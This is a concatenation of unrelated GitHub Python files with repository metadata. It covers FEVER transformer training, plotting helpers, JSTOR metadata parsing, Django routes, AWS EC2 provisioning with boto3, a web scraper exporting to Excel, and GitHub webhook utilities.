for batch in tqdm(test_dl, desc="Evaluation"):
loss, logits_val = model(batch[0],
attention_mask=batch[0] > 1,
labels=batch[1])
loss = loss_f(logits_val, batch[1].long())
losses.append(loss.item())
labels_all += batch[1].detach().cpu().numpy().tolist()
logits_all += logits_val.detach().cpu().numpy().tolist()
prediction = np.argmax(np.asarray(logits_all).reshape(-1, args.labels),
axis=-1)
p, r, f1, _ = precision_recall_fscore_support(labels_all, prediction,
average='macro')
print(confusion_matrix(labels_all, prediction), flush=True)
return p, r, f1, np.mean(losses)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--gpu", help="Flag for training on gpu",
action='store_true', default=False)
parser.add_argument("--seed", help="Random seed", type=int, default=73)
parser.add_argument("--labels",
help="2 labels if NOT ENOUGH INFO excluded, "
"3 otherwise",
type=int, default=3)
parser.add_argument("--train_dataset", help="Path to the train datasets",
default='data/train_nli.jsonl', type=str)
parser.add_argument("--dev_dataset", help="Path to the dev datasets",
default='data/dev_nli.jsonl', type=str)
parser.add_argument("--test_dataset", help="Path to the test datasets",
default='data/test_nli.jsonl', type=str)
parser.add_argument("--type", help="Type of transformer model",
choices=['bert', 'roberta'], default='bert')
parser.add_argument("--model_path",
help="Path where the model will be serialized",
default='ferver_bert', type=str)
parser.add_argument("--batch_size", help="Batch size", type=int, default=8)
parser.add_argument("--lr", help="Learning Rate", type=float, default=5e-5)
parser.add_argument("--epochs", help="Epochs number", type=int, default=4)
parser.add_argument("--mode", help="Mode for the script", type=str,
default='train', choices=['train', 'test'])
args = parser.parse_args()
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
torch.backends.cudnn.deterministic = True
np.random.seed(args.seed)
device = torch.device("cuda") if args.gpu else torch.device("cpu")
if args.type == 'bert':
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
transformer_config = BertConfig.from_pretrained('bert-base-uncased',
num_labels=args.labels)
model = BertForSequenceClassification(transformer_config).to(device)
else:
tokenizer = RobertaTokenizer.from_pretrained('roberta-base')
transformer_config = RobertaConfig.from_pretrained('roberta-base',
num_labels=args.labels) # , use_bfloat16=True
model = RobertaForSequenceClassification.from_pretrained('roberta-base',
config=transformer_config).to(
device)
collate_fn = partial(collate_fever, tokenizer=tokenizer, device=device)
print(args, flush=True)
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{
'params': [p for n, p in param_optimizer if
not any(nd in n for nd in no_decay)],
'weight_decay': 0.01
},
{
'params': [p for n, p in param_optimizer if
any(nd in n for nd in no_decay)], 'weight_decay': 0.0
}]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.lr)
if args.mode == 'test':
test = FeverDataset(args.test_dataset)
# print(Counter([_x['label'] for _x in test]).most_common(3))
test_dl = BucketBatchSampler(batch_size=args.batch_size,
sort_key=sort_key, dataset=test,
collate_fn=collate_fn)
checkpoint = torch.load(args.model_path)
model.load_state_dict(checkpoint['model'])
print(eval_model(model, test_dl))
else:
print("Loading datasets...")
train = FeverDataset(args.train_dataset)
dev = FeverDataset(args.dev_dataset)
# print(Counter([_x['label'] for _x in train]).most_common(3))
# print(Counter([_x['label'] for _x in dev]).most_common(3))
train_dl = BucketBatchSampler(batch_size=args.batch_size,
sort_key=sort_key,
dataset=train,
collate_fn=collate_fn)
dev_dl = BucketBatchSampler(batch_size=args.batch_size,
sort_key=sort_key, dataset=dev,
collate_fn=collate_fn)
num_train_optimization_steps = int(
args.epochs * len(train) / args.batch_size)
scheduler = get_constant_schedule_with_warmup(optimizer,
num_warmup_steps=0.05)
best_model_w, best_perf = train_model(model, train_dl, dev_dl,
optimizer, scheduler, args.epochs)
checkpoint = {
'performance': best_perf,
'args': vars(args),
'model': best_model_w,
}
print(best_perf)
print(args)
torch.save(checkpoint, args.model_path)
| copenlu/fever-adversarial-attacks | builders/train_transformer.py | train_transformer.py | py | 8,288 | python | en | code | 11 | github-code | 36 | [
{
"api_name": "torch.nn",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data.sampler.BatchSampler",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "torch.optim",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "... |
16534298320 | import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
class VizHelp():
# Additional Usefull Display Methods
def plotPredictions(self, predictions, targets, decoder_steps, epochs, file_name, show=True):
stock_name = file_name.split('.')[0].upper()
if '/' in stock_name:
stock_name = stock_name.split('/')[-1]
plt.plot(targets, label='Actual')
plt.plot(predictions, label='Predicted')
plt.legend()
plt.xlabel('Samples')
plt.ylabel('Scaled Price')
plt.title(f'Price Prediction {stock_name}: D={decoder_steps}, Epoch={epochs}', fontsize=14)
print(f'Saving image to: plots/Test_{stock_name}D{decoder_steps}_E{epochs}.png')
plt.savefig(f'plots/Test_{stock_name}_D{decoder_steps}_E{epochs}.png')
if show:
plt.show()
else:
plt.close()
def plotMSE(self, errors, decoder_steps, num_samples=1, name='', show=True):
epoch_counts = [i/num_samples for i in range(len(errors))]
plt.plot(epoch_counts, errors)
plt.xlabel('Epochs')
plt.ylabel('MSE')
plt.title(f'MSE {name}: D={decoder_steps}', fontsize=14)
print(f'Saving image to: plots/{name}D{decoder_steps}_E{epoch_counts[-1]}.png')
plt.savefig(f'plots/{name}_D{decoder_steps}_E{epoch_counts[-1]}.png')
if show:
plt.show()
else:
plt.close() | rvariverpirate/TRN_StockPrediction | VisualizationHelpers.py | VisualizationHelpers.py | py | 1,429 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "seaborn.set",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot... |
16515258502 | """
ARGUMENTS: python3 ParseMetaFilesUpdated.py <path-to-jstor-data> <which-part> <how-many-parts> <output-path>
<how-many-parts>: for parallel processing, this should be the number of workers available to run the program; 1 if not running in parallel.
<which-part>: for parallel processing, this should be a unique number for each worker, from 1 to <how-many-parts>; 1 if not running in parallel.
USAGE: This program takes already-split dictionaries and reads in a batch of JSTOR article n-gram files to count the number of appearances of each n-gram in the dictionaries.
INPUT: JSTOR metadata files.
OUTPUT: A table in HDF5 format, indexed on 'file_name', consisting of 18 columns.
"""
import math
import os
import re
import sys
from tqdm import tqdm
from xml.etree import ElementTree as ET
import pandas as pd
# check if improper number of arguments; if so, return instructions and quit
if len(sys.argv) != 5:
print(__doc__)
exit()
# read in arguments from command line
JSTOR_HOME, NUM, NUM_CPUS, OUTPATH = sys.argv[1:]
NUM, NUM_CPUS = int(NUM), int(NUM_CPUS)
METADATA_HOME = os.path.join(JSTOR_HOME, 'metadata/')
path, dirs, files = next(os.walk(METADATA_HOME))
files = [(path + file) for file in files] # Add folder name "path" as prefix to file
NUM_EACH = math.ceil(len(files) / NUM_CPUS)
LEFT = (NUM - 1) * NUM_EACH
RIGHT = LEFT + NUM_EACH
files = files[LEFT:RIGHT]
def add(elem, attrs):
# TO DO: Filter by article-type?
elements = attrs['elements']
surnames = attrs['surname']
given_names = attrs['given-names']
tag = elem.tag
if tag in attrs['df_cols']:
if tag == 'journal-id':
tag = 'journal_id'
elif tag == 'article':
article_attrs = elem.attrib
article_type = article_attrs['article-type']
tag = 'type'
elem.text = article_type
elif tag =='journal-title':
tag = 'journal_title'
elif tag == 'article-id':
tag = 'article_id'
elif tag == 'article-name':
tag = 'article_name'
elif tag == 'surname':
if type(elem.text) == 'str':
surnames.append(elem.text.split(',')[0])
else:
surnames.append('None')
elem.text = surnames
elif tag == 'given-names':
tag = 'given_names'
given_names.append(elem.text)
elem.text = given_names
elif tag == 'issue-id':
tag = 'issue_id'
elif tag == 'ns1:ref':
tag = 'jstor_url'
elif tag == 'p':
tag = 'abstract'
# if tag not in elements:
# elements[tag] = pd.Series([elem.text])
# else:
# elements[tag].append(pd.Series([elem.text]), ignore_index=True)
len_list = len(elements[tag])
elements[tag][len_list - 1] = elem.text
for child in elem.findall('*'):
add(child, attrs)
def xml2df(xml_files):
"""Transforms XML files into a Pandas DataFrame.
Args:
files: list of complete file paths
Returns:
df: DataFrame with article info"""
all_records = {'type':[], 'journal_id':[], 'journal_title':[], 'issn':[], 'article_id':[], 'article_name':[], 'given_names':[], 'surname':[], 'day':[], 'month':[], 'year':[], 'volume':[], 'issue':[], 'issue_id':[], 'fpage':[], 'lpage':[], 'jstor_url':[], 'abstract':[]}
attrs = {}
attrs['elements'] = all_records
attrs['surname'] = []
attrs['given-names'] = []
attrs['df_cols'] = ['article', 'journal-id', 'journal-title', 'issn', 'article-id', 'article-name', 'given-names', 'surname', 'day', 'month', 'year', 'volume', 'issue', 'issue-id', 'fpage', 'lpage', 'ns1:ref', 'p']
for file in tqdm(xml_files):
with open(file, 'rb') as f:
t = ET.parse(f) # element tree
root = t.getroot()
for record in all_records:
all_records[record].append('None')
add(root, attrs)
#print(all_records)
print ('Start creating data frame')
df = pd.DataFrame(all_records)
return df
# This is definitely NOT a good practice. However, I'm trying not to break what's running properly.
def amend_df(df, files):
file_names = []
jstor_urls = []
abstracts = []
article_names = []
for file in tqdm(files):
file_names.append(re.findall('journal-article-.+\.xml', file)[0][:-4])
with open(file, 'rb') as f:
t = ET.parse(f) # element tree
root = t.getroot()
try:
jstor_urls.append(root.find('front').find('article-meta').find('self-uri').items()[0][1])
except:
jstor_urls.append('None')
try:
abstracts.append(root.find('front').find('article-meta').find('abstract').find('p').text)
except:
abstracts.append('None')
try:
article_names.append(root.find('front').find('article-meta').find('title-group').find('article-title').text)
except:
article_names.append('None')
df.loc[:, 'file_name'] = file_names
df.loc[:, 'jstor_url'] = jstor_urls
df.loc[:, 'abstract'] = abstracts
df.loc[:, 'article_name'] = article_names
print('Start processing')
df = xml2df(files)
print('Start amending')
amend_df(df, files)
# df.to_pickle('pickles/part{}.pickle'.format(n))
df.set_index('file_name').to_hdf(os.path.join(OUTPATH, 'part{}.h5'.format(NUM)), key='metadata', mode='w')
#df.set_index('file_name').to_pickle(os.path.join(OUTPATH, 'part{}.pickle'.format(NUM))) | h2researchgroup/dictionary_methods | code/ParseMetaFilesUpdated.py | ParseMetaFilesUpdated.py | py | 5,612 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number":... |
4615311890 | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name = "home"),
path('shop/', views.shop, name = "shop"),
path('about/', views.about, name = "about"),
path('contact/', views.contact, name = "contact"),
path('faq/', views.faq, name = "faq"),
] | brownlenox/djangostaticfiles | mainapp/urls.py | urls.py | py | 302 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
39647238473 |
from django.urls import path
from .views import newpost_add, post_list, post_detail, post_update,post_delete,about_page, post_like
urlpatterns = [
path('add', newpost_add, name='add'),
path('', post_list, name='list'),
path('detail/<int:id>', post_detail, name='detail'),
path('update/<int:id>', post_update, name='update'),
path('delete/<int:id>', post_delete, name='delete'),
path('about', about_page, name='about'),
path('like/<int:id>', post_like, name="post_like")
] | yildirimesutx/Django_Blog_Project_102 | blog/urls.py | urls.py | py | 501 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "views.newpost_add",
"line_number": 6,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "views.post_list"... |
16772279994 | import urllib
import boto3
from botocore.exceptions import ClientError
ec2 = boto3.client("ec2")
def get_my_public_ip():
external_ip = urllib.request.urlopen(
'https://ident.me').read().decode('utf8')
print('Public ip - ', external_ip)
return external_ip
def create_key_pair(name):
try:
response = ec2.create_key_pair(
KeyName=name,
KeyType="rsa",
)
with open(f"{name}.pem", "w") as file:
file.write(response.get("KeyMaterial"))
print(f"{name} Key has been crated")
return response.get("KeyPairId")
except ClientError as e:
print(e)
return
def create_security_group(client, name, description, vpc_id):
response = client.create_security_group(
Description=description,
GroupName=name,
VpcId=vpc_id)
group_id = response.get('GroupId')
print('Security Group Id - ', group_id)
return group_id
def add_ssh_access_sg(client, sg_id, ip_address):
ip_address = f'{ip_address}/32'
response = client.authorize_security_group_ingress(
CidrIp=ip_address,
FromPort=22,
GroupId=sg_id,
IpProtocol='tcp',
ToPort=22,
)
if response.get('Return'):
print('Rule added successfully')
else:
print('Rule was not added')
def add_http_access_sg(client, sg_id):
ip_address = '0.0.0.0/0'
response = client.authorize_security_group_ingress(
CidrIp=ip_address,
FromPort=80,
GroupId=sg_id,
IpProtocol='tcp',
ToPort=80,
)
if response.get('Return'):
print('Rule added successfully')
else:
print('Rule was not added')
def create_security_group(client, name, description, vpc_id):
response = client.create_security_group(
Description=description,
GroupName=name,
VpcId=vpc_id)
group_id = response.get('GroupId')
print('Security Group Id - ', group_id)
return group_id
def create_instance(client, group_id, subnet_id):
response = client.run_instances(
BlockDeviceMappings=[{'DeviceName': '/dev/sdh',
'Ebs': {'DeleteOnTermination': True,
'VolumeSize': 10,
'VolumeType': 'gp2',
'Encrypted': False}
}],
ImageId='ami-0022f774911c1d690',
InstanceType='t2.micro',
KeyName='my-key',
InstanceInitiatedShutdownBehavior='terminate',
MaxCount=1,
MinCount=1,
NetworkInterfaces=[
{
'AssociatePublicIpAddress': True,
'DeleteOnTermination': True,
'Description': 'string',
'Groups': [
group_id
],
'DeviceIndex':0,
'SubnetId':subnet_id
},
])
for instance in response.get('Instances'):
instance_id = instance.get('InstanceId')
print('InstanceId - ', instance_id)
def main(vpc_id, subnet_id):
group_id = create_security_group(ec2, 'my', 'grp', vpc_id)
add_http_access_sg(ec2, group_id)
my_ip = get_my_public_ip()
add_ssh_access_sg(ec2, group_id, my_ip)
create_instance(ec2, group_id, subnet_id)
if __name__ == '__main__':
main("vpc-id", "subnet-id")
| annatezelashvili/AWS_Python_Automation | Tasks/Task10-11/create_ec2.py | create_ec2.py | py | 3,423 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "boto3.client",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "urllib.request.urlopen",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "urllib.request",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "botocore.excepti... |
6697035634 | from models.arch.network import Network
from torch.nn import functional as F
import torch
model = Network(stage=2, depth=8).cuda()
model.set_query_codebook()
model.load_state_dict(torch.load("./pretrained_models/LOLv1.pth"))
x = torch.ones(1, 3, 256, 256).cuda()
with torch.no_grad():
M = F.relu(x - model.thr_conv(x))
f1, f2, f3 = model.encode(x)
fq, distance_map = model.vq_64.forward_with_query(f3, model.query)
f1_d, f2_d, f3_d = model.decode(fq)
f1_cat = model.fusion_128([model.up_fusion_2(f3), f2, f2_d, model.down_fusion_local(f1), model.down_fusion_prior(f1_d)])
f1_f = model.decoder_128_fusion(f1_cat)
f1_f_wo_ba = f1_f
f1_f = f1_f + f1_f * model.BA_128(M)
f2_cat = torch.cat([model.up_fusion_3(f1_f), f1, f1_d, model.up_fusion_local(f2), model.up_fusion_prior(f2_d)])
f2_f = model.decoder_256_fusion(f2_cat)
f2_f = f2_f + f2_f * model.BA_256(M)
x_rec = model.conv_fusion_out(f2_f)
ckpt = torch.load("/home/liuyunlong/project/code/SNR-Aware-Low-Light-Enhance-main/ckpt.pth")
dic = {'feat_256': f1, 'feat_128': f2, 'feat_64': f3, 'feat_q': fq, 'decode_64': f3_d, 'decode_128': f2_d,
'decode_256': f1_d, 'fusion_128': f1_f, 'fusion_256': f2_f, 'fusion_128_wo_ba': f1_f_wo_ba}
for item in dic:
print(f"{item}-->{torch.equal(dic[item], ckpt[item])}")
| TaoHuang95/RQ-LLIE | test.py | test.py | py | 1,359 | python | en | code | null | github-code | 36 | [
{
"api_name": "models.arch.network.Network",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"l... |
17176681083 | import os
import logging
from logging import handlers
from api.common.jsonFormatter import JsonFormatter
# json形式で出力するログファイル
class Api_logger_json():
def __init__(self, name):
super().__init__()
# ログ取得
self.log = logging.getLogger(name + "_json")
if not self.log.hasHandlers():
# ログレベル
self.log.setLevel(logging.INFO)
# handrer追加
# ベースパス取得
bath_pash = os.getcwd()
# 日付ローテーションおよび7日
# jsonにする場合、日本語が文字化けするのでライブライリーを修正する必要がある
# 「json_log_formatter」ディレクトリ内の「__init__.py」の「to_json」のreturnメソッドに
# [, ensure_ascii=False]を追加
# ライブラリの場所は、[pip show パッケージ名]でわかる
file_handler = logging.handlers.TimedRotatingFileHandler(
filename=bath_pash + '/log/app_json.log', encoding='UTF-8', when='MIDNIGHT', backupCount=7)
# 日本語出力対応
formatter = JsonFormatter(json_ensure_ascii=False)
file_handler.setFormatter(formatter)
self.log.addHandler(file_handler)
def getLogger(self):
return self.log
| war-bonds-rx78/python_flask_db_sample | api/common/logger_json.py | logger_json.py | py | 1,381 | python | ja | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "logging.handlers.TimedR... |
35217252222 | from enum import IntEnum
import requests
from urllib.request import urlopen
import urllib
from selenium import webdriver
from bs4 import BeautifulSoup
import http.client
from openpyxl import Workbook
from openpyxl import load_workbook
from openpyxl.writer.excel import ExcelWriter
from openpyxl.cell.cell import ILLEGAL_CHARACTERS_RE
import json
from functools import reduce
import string
import re
import time
import math
http.client._MAXHEADERS = 1000
def urllib_download(IMAGE_URL, pName):
try:
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
urllib.request.urlretrieve(IMAGE_URL, pName.replace("/","").replace("\\","")+'.jpg')
except:
print('no')
def getNodeText(node):
if(node == None):
return ""
else:
return node.get_text().strip()
retryCount = 0
def requestJson(url):
r = requests.get(url, headers={
'Content-Type': 'application/json; charset=utf-8',
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
})
datas = json.loads(r.text)
return datas
def writeExcel(workSheet, headers, rowIndex, info):
cellIndex=1
for head in headers:
try:
if head in info:
content = ILLEGAL_CHARACTERS_RE.sub(r'', info[head])
workSheet.cell(rowIndex, cellIndex).value = content.strip()
else:
workSheet.cell(rowIndex, cellIndex).value = ""
cellIndex=cellIndex+1
except:
print(rowIndex)
def getProductList(url, products):
print(url)
data = requestJson(url)
for pInfoData in data["data"]:
attrInfo = pInfoData["attributes"]
uId = attrInfo["uuid"]
pInfoDetail = requestJson("https://unc.flintbox.com/api/v1/technologies/"+uId+"?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596")
includes = pInfoDetail["included"]
member = reduce(lambda m, cur: cur if cur["type"] == "member" else m, includes, None)
connector = reduce(lambda m, cur: cur if cur["type"] == "contact" else m, includes, None)
pInfo = {
"Title": attrInfo["name"],
"Published": attrInfo["publishedOn"],
"Webpage": "https://unc.flintbox.com/technologies/"+uId,
"Inventor(s)": member["attributes"]["fullName"] if member != None else '',
"Licensing Contact Person": connector["attributes"]["fullName"] if connector != None else '',
"Licensing Contact Email": connector["attributes"]["email"] if connector != None else '',
}
products.append(pInfo.copy())
excelFileName="otcuncedu.xlsx"
wb = Workbook()
workSheet = wb.active
products = []
headers=[
'Title','Published','Webpage','Inventor(s)','Licensing Contact Person','Licensing Contact Email','备注'
]
# getProductList("https://unc.flintbox.com/api/v1/technologies?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596&page=1&query=", products)
for pageIndex in range(1, 14):
getProductList("https://unc.flintbox.com/api/v1/technologies?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596&page="+str(pageIndex)+"&query=", products)
for index,head in enumerate(headers):
workSheet.cell(1, index+1).value = head.strip()
for index,p in enumerate(products):
writeExcel(workSheet, headers, index + 2, p)
print("flish")
wb.save(excelFileName) | Just-Doing/python-caiji | src/work/20210807/otcuncedu.py | otcuncedu.py | py | 3,301 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "http.client.client",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "http.client",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "urllib.request.build_opener",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "urlli... |
16277554121 | import pygame
from constants import *
import numpy
class Board:
# Initializing the board with screen as an input
def __init__(self, screen) -> None:
self.screen = screen
self.game_array = numpy.zeros((WINDOW_SIZE // CUBE_SIZE, WINDOW_SIZE // CUBE_SIZE))
self.draw_board()
self.turn = 1
self.game_is_on = True
# Drawing the board
def draw_board(self):
# Drawing vertical lines
for x in range(1, VERTICAL_LINES + 1):
pygame.draw.line(self.screen, BLACK, (0, CUBE_SIZE * x), (CUBE_SIZE * 3, CUBE_SIZE * x), LINE_WIDTH)
# Drawing horizontal lines
for y in range(1, HORIZONTAL_LINES + 1):
pygame.draw.line(self.screen, BLACK, (CUBE_SIZE * y, 0), (CUBE_SIZE * y, CUBE_SIZE * 3), LINE_WIDTH)
# Changing turn
def change_turn(self):
self.turn *= -1
# Checking if field is available
def is_available(self, pos) -> bool:
if self.game_array[pos[0]][pos[1]] == 0:
return True
return False
# Putting mark on the field and changing turn
def put_mark(self, pos):
if self.is_available(pos):
# -1 is cross
if self.turn == -1:
# Loading image of a cross
img = pygame.image.load("Tic_Tac_Toe/resources/cross.png")
img = pygame.transform.scale(img, (CUBE_SIZE // 1.5, CUBE_SIZE // 1.5))
# 1 is dot
elif self.turn == 1:
# Loading image of a dot
img = pygame.image.load("Tic_Tac_Toe/resources/dot.png")
img = pygame.transform.scale(img, (CUBE_SIZE // 1.5, CUBE_SIZE // 1.5))
self.game_array[pos[0]][pos[1]] = self.turn
x = pos[0] * CUBE_SIZE + CUBE_SIZE // 6
y = pos[1] * CUBE_SIZE + CUBE_SIZE // 6
self.screen.blit(img, (y, x))
self.change_turn()
# Winning line
def draw_winning_line(self, start_pos:tuple, end_pos:tuple):
start_x = start_pos[0] * CUBE_SIZE + CUBE_SIZE // 2
start_y = start_pos[1] * CUBE_SIZE + CUBE_SIZE // 2
end_x = end_pos[0] * CUBE_SIZE + CUBE_SIZE // 2
end_y = end_pos[1] * CUBE_SIZE + CUBE_SIZE // 2
return pygame.draw.line(self.screen, RED, (start_x, start_y), (end_x, end_y), LINE_WIDTH)
# Ending text
def write_ending_text(self, text:str):
font = pygame.font.Font(None, 36)
text = font.render(f"{text}", True, BLACK)
space = font.render("Press Space to Restart", True, BLACK)
self.screen.blit(text, (15, 15))
self.screen.blit(space, (CUBE_SIZE + CUBE_SIZE // 12, WINDOW_SIZE // 1.05))
# Checking for win or tie
def check_for_win(self):
# Checking if win for rows
for row in range(3):
winning_row = 0
for col in range(3):
if self.game_array[row][col] == 1:
winning_row += 1
elif self.game_array[row][col] == -1:
winning_row += -1
# Checking if row is full of X or O
if winning_row == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((0, row),(2, row))
self.game_is_on = False
break
elif winning_row == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((0, row),(2, row))
self.game_is_on = False
break
# Checking if win for cols
for row in range(3):
winning_col = 0
for col in range(3):
if self.game_array[col][row] == 1:
winning_col += 1
elif self.game_array[col][row] == -1:
winning_col += -1
# Checking if column is full of X or O
if winning_col == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((row, 0),(row, 2))
self.game_is_on = False
break
elif winning_col == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((row, 0),(row, 2))
self.game_is_on = False
break
# Checking if win for axis
if self.game_array[0][0] + self.game_array[1][1] + self.game_array[2][2] == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((0, 0),(2, 2))
self.game_is_on = False
elif self.game_array[0][2] + self.game_array[1][1] + self.game_array[2][0] == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((0, 2),(2, 0))
self.game_is_on = False
elif self.game_array[0][0] + self.game_array[1][1] + self.game_array[2][2] == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((0, 0),(2, 2))
self.game_is_on = False
elif self.game_array[0][2] + self.game_array[1][1] + self.game_array[2][0] == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((0, 2),(2, 0))
self.game_is_on = False
# Checking for a tie
num_of_zeroes = 0
for row in range(3):
for col in range(3):
if self.game_array[row][col] == 0:
num_of_zeroes += 1
if num_of_zeroes == 0 and self.game_is_on:
self.write_ending_text("It's a tie!")
self.game_is_on = False
| szczepanspl/tic_tac_toe | board.py | board.py | py | 5,668 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pygame.draw.line",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "pygame.draw",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "pygame.draw.line",
"... |
34109397178 | import requests
from tunga_tasks import slugs
EVENT_PUSH = 'push'
EVENT_CREATE = 'create'
EVENT_DELETE = 'delete'
EVENT_COMMIT_COMMENT = 'commit_comment'
EVENT_PULL_REQUEST = 'pull_request'
EVENT_PULL_REQUEST_REVIEW_COMMENT = 'pull_request_review_comment'
EVENT_ISSUE = 'issue'
EVENT_ISSUE_COMMENT = 'issue_comment'
EVENT_GOLLUM = 'gollum'
EVENT_RELEASE = 'release'
HEADER_EVENT_NAME = 'HTTP_X_GITHUB_EVENT'
HEADER_DELIVERY_ID = 'HTTP_X_GITHUB_DELIVERY'
PAYLOAD_ACTION = 'action'
PAYLOAD_ACTION_CREATED = 'created'
PAYLOAD_ACTION_DELETED = 'deleted'
PAYLOAD_ACTION_OPENED = 'opened'
PAYLOAD_ACTION_EDITED = 'edited'
PAYLOAD_ACTION_CLOSED = 'closed'
PAYLOAD_ACTION_REOPENED = 'reopened'
PAYLOAD_ACTION_PUBLISHED = 'published'
PAYLOAD_COMMENT = 'comment'
PAYLOAD_HTML_URL = 'html_url'
PAYLOAD_SENDER = 'sender'
PAYLOAD_USER = 'user'
PAYLOAD_USERNAME = 'login'
PAYLOAD_AVATAR_URL = 'avatar_url'
PAYLOAD_BODY = 'body'
PAYLOAD_CREATED_AT = 'created_at'
PAYLOAD_REF_TYPE = 'ref_type'
PAYLOAD_REF = 'ref'
PAYLOAD_REF_TYPE_REPO = 'repository'
PAYLOAD_REF_TYPE_BRANCH = 'branch'
PAYLOAD_REF_TYPE_TAG = 'tag'
PAYLOAD_REPOSITORY = 'repository'
PAYLOAD_PAGES = 'pages'
PAYLOAD_PAGE_NAME = 'page_name'
PAYLOAD_TITLE = 'title'
PAYLOAD_SUMMARY = 'summary'
PAYLOAD_HEAD_COMMIT = 'head_commit'
PAYLOAD_URL = 'url'
PAYLOAD_MESSAGE = 'message'
PAYLOAD_TIMESTAMP = 'timestamp'
PAYLOAD_ID = 'id'
PAYLOAD_TREE_ID = 'tree_id'
PAYLOAD_PULL_REQUEST = 'pull_request'
PAYLOAD_NUMBER = 'number'
PAYLOAD_MERGED = 'merged'
PAYLOAD_MERGED_AT = 'merged_at'
PAYLOAD_ISSUE = 'issue'
PAYLOAD_RELEASE = 'release'
PAYLOAD_TAG_NAME = 'tag_name'
REPOSITORY_FIELDS = ['id', 'name', 'description', 'full_name', 'private', 'url', 'html_url']
ISSUE_FIELDS = ['id', 'number', 'title', 'body', 'url', 'html_url', 'repository']
def transform_to_github_events(events):
"""
Transforms Tunga integration events to corresponding GitHub events
:param events: A list of Tunga events
:return: A list of GitHub events
"""
github_events = []
event_map = {
slugs.BRANCH: [EVENT_CREATE, EVENT_DELETE],
slugs.TAG: [EVENT_CREATE, EVENT_DELETE],
slugs.PULL_REQUEST_COMMENT: EVENT_PULL_REQUEST_REVIEW_COMMENT,
slugs.WIKI: EVENT_GOLLUM,
}
if events:
for tunga_event in events:
if tunga_event in event_map:
co_events = event_map[tunga_event]
if isinstance(co_events, list):
github_events.extend(co_events)
else:
github_events.append(co_events)
else:
github_events.append(tunga_event)
return list(set(github_events))
def transform_to_tunga_event(event):
event_map = {
EVENT_CREATE: slugs.BRANCH,
EVENT_DELETE: slugs.BRANCH,
EVENT_PULL_REQUEST_REVIEW_COMMENT: slugs.PULL_REQUEST_COMMENT,
EVENT_GOLLUM: slugs.WIKI,
}
return event_map.get(event, event)
def extract_repo_info(repo):
repo_info = {}
for key in REPOSITORY_FIELDS:
repo_info[key] = repo[key]
return repo_info
def api(endpoint, method, params=None, data=None, access_token=None):
headers = {
'Accept': 'application/vnd.github.v3+json',
'Content-Type': 'application.json'
}
if access_token:
headers['Authorization'] = 'token %s' % access_token
return requests.request(
method=method, url='https://api.github.com'+endpoint, params=params, json=data, headers=headers
)
| jonathanzerox/tunga-api | tunga_utils/github.py | github.py | py | 3,509 | python | en | code | 0 | github-code | 36 | [
{
